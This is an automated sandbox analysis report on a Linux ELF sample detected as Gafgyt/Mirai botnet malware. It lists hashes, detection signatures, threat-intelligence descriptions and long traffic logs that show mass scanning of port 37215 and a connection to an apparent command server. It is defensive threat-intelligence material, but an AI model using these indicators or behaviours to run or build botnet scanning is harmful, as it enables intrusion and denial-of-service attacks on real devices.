Linux Analysis Report
skid.x86.elf

Overview

General Information

Sample name:	skid.x86.elf
Analysis ID:	1427746
MD5:	2ee9003241bf69886f48e653f483cc7f
SHA1:	f17c5945e28d2c48f741e8f896dd57e6ac816f9d
SHA256:	9147282b77d7164a7e41fba802f3f6d1d4a73c435f25a4827d7f61ceb2d658dc
Infos:

Detection

Gafgyt, Mirai

Score:	92
Range:	0 - 100
Whitelisted:	false

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Gafgyt

Yara detected Mirai

Connects to many ports of the same IP (likely port scanning)

Machine Learning detection for sample

Sample reads /proc/mounts (often used for finding a writable filesystem)

Sample tries to kill multiple processes (SIGKILL)

Uses known network protocols on non-standard ports

Creates hidden files and/or directories

Detected TCP or UDP traffic on non-standard ports

HTTP GET or POST without a user agent

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Bashlite, Gafgyt	Bashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.	No Attribution	http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/ https://blog.cyber5w.com/gafgyt-backdoor-analysis https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/ https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/ https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: skid.x86.elf	ReversingLabs: Detection: 57%
Source: skid.x86.elf	Virustotal: Detection: 38%			Perma Link

Machine Learning detection for sample

Source: skid.x86.elf

Joe Sandbox ML: detected

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 183.220.195.19 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 191.61.224.12 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 157.17.36.152 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 197.181.58.88 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 41.117.210.187 ports 1,2,3,5,7,37215

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 48862 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 48862
Source: unknown	Network traffic detected: HTTP traffic on port 38244 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34944 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36676 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53372 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34944 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 36676
Source: unknown	Network traffic detected: HTTP traffic on port 34944 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34944 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46140 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46140 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38324 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 38324
Source: unknown	Network traffic detected: HTTP traffic on port 58002 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 36882
Source: unknown	Network traffic detected: HTTP traffic on port 55728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40152 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54768 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54768 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 44784 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 32890 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34910 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54556 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33534 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34970 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 40728
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39724 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34342 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 34342
Source: unknown	Network traffic detected: HTTP traffic on port 45022 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36320 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55728 -> 37215

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.13:39112 -> 2.58.95.134:64356
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 124.214.75.0:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.21.166.95:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.206.163.38:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 44.253.142.120:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.211.68.27:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 114.221.104.92:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.6.15.225:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.234.48.60:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.191.158.233:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.100.138.215:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.50.160.50:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 207.111.133.132:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 13.235.186.163:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.157.185.177:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 147.145.88.176:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.207.179.134:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.21.254.17:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.32.192.22:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.88.12.59:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.49.245.78:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 125.58.206.52:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.45.229.166:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 97.47.136.140:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.37.86.162:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.42.91.193:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 220.133.39.73:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.115.229.75:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.79.35.182:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.174.86.81:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.103.25.213:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 196.113.10.13:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.106.141.101:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 45.221.209.59:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.115.34.84:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.117.221.42:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.170.123.12:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.53.176.245:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.27.37.233:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.190.91.69:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 46.214.254.4:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 38.49.130.61:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.212.14.160:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 36.217.12.225:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 79.151.233.28:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.2.166.186:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 171.163.152.1:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.184.151.9:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 150.215.159.117:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.117.7.199:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.248.150.228:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.196.152.153:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.49.15.175:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.235.194.223:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.124.32.138:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.231.158.24:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.137.95.171:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.218.69.177:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.205.236.46:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.128.142.131:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.202.133.87:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.3.212.204:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.48.84.182:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.156.16.185:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.87.101.35:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.189.126.67:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.158.144.0:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.83.54.34:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 164.36.17.168:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.87.240.148:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.231.139.218:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 77.92.0.151:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.200.188.152:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.7.244.159:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.248.17.119:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 4.45.128.69:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 149.236.69.15:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.164.248.111:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.206.19.0:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 207.123.170.127:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.147.73.210:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.21.42.50:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.105.172.96:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 42.126.104.159:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.93.72.33:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.115.193.90:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.217.61.193:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 2.119.231.33:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.221.184.230:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.67.207.148:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 12.184.140.103:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.46.226.187:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 108.211.99.78:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.216.14.226:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.221.51.94:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 112.253.82.106:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.194.246.144:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.103.10.99:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.69.111.101:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.103.247.221:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 36.186.174.136:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.141.28.130:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.218.159.44:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 99.58.3.58:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.63.235.98:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.115.49.54:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.147.253.55:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.166.241.4:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 40.76.128.176:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.248.83.250:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 117.95.146.198:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 122.179.30.139:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.50.148.194:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.215.194.126:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.219.104.47:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.11.166.215:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 63.207.180.234:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.175.86.69:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.78.204.184:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.244.18.83:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.31.92.119:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.99.58.15:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.107.143.79:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.172.202.237:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 77.180.161.167:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.30.134.60:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.65.241.34:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 183.220.195.19:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.118.80.235:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.180.66.58:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.11.186.108:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.180.230.20:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 118.166.66.103:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.194.166.225:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.103.159.242:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 69.55.230.192:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.151.121.240:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 47.74.176.109:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.228.115.100:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.155.226.89:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.159.54.53:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.12.137.173:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.181.58.88:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.22.199.40:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.223.62.154:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.165.100.138:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.49.8.56:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 141.200.214.120:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.125.234.181:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.228.134.164:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.227.223.235:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 1.92.234.13:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 77.181.187.6:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 221.217.23.106:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 160.175.172.7:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.49.17.42:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.117.75.12:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.101.81.205:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.113.127.216:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.170.11.186:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.21.154.172:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.200.84.244:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 88.26.59.89:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 132.204.208.207:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.36.7.161:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.221.104.36:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.128.86.130:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.241.122.12:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 66.146.153.200:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.77.197.243:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.1.162.1:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.106.150.227:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 158.132.51.166:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.168.150.45:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 212.151.123.236:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.23.193.13:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.198.187.199:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.187.230.145:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.27.48.172:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 118.5.207.144:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.7.21.200:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 152.162.254.208:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.3.146.10:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.223.254.56:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.14.205.203:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.169.25.229:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.178.250.113:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.51.41.36:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 155.160.128.133:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.167.141.206:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 90.200.32.38:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.41.143.43:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 162.137.130.147:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 135.94.210.132:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.73.52.166:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.169.128.187:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.186.69.211:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.80.250.235:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.214.233.14:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 73.43.201.174:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 115.140.131.180:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.198.89.97:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.234.252.16:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.24.237.233:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.105.130.152:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.102.112.249:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.17.181.115:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.28.102.73:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.92.215.173:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 161.52.232.0:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.87.140.159:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.2.51.94:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 68.122.202.61:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.105.0.216:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 220.240.254.38:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.160.240.145:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.115.84.160:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.184.181.163:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 23.133.86.60:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.129.129.233:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.2.152.3:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.186.50.219:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.190.58.190:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.88.76.34:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.226.237.136:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 160.101.244.197:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.202.233.237:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 5.55.67.194:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.5.222.73:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.182.2.216:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.181.224.101:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.162.194.184:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 66.204.51.160:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.8.39.43:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.41.7.185:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.100.65.230:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.226.171.169:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.241.159.217:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.184.186.116:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.186.34.5:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.53.228.191:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.53.224.50:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.54.190.95:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.182.65.62:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.117.210.187:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 77.45.81.111:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 43.33.214.35:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 98.95.120.206:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.163.139.215:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.194.246.70:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 24.153.226.109:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.235.242.214:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.156.71.56:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.152.244.99:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.244.1.155:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.246.23.116:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.91.147.93:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.195.171.215:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 158.60.115.231:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.189.135.144:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.140.214.236:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.223.26.13:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.217.151.127:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.157.162.61:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 111.235.41.237:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 200.33.96.19:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.206.99.206:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 31.41.179.86:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.41.8.165:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 201.12.161.8:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.87.131.204:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.167.43.218:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.137.78.152:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 146.43.15.183:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.19.68.243:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.35.31.10:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 175.253.189.152:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.159.235.14:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.151.126.162:37215
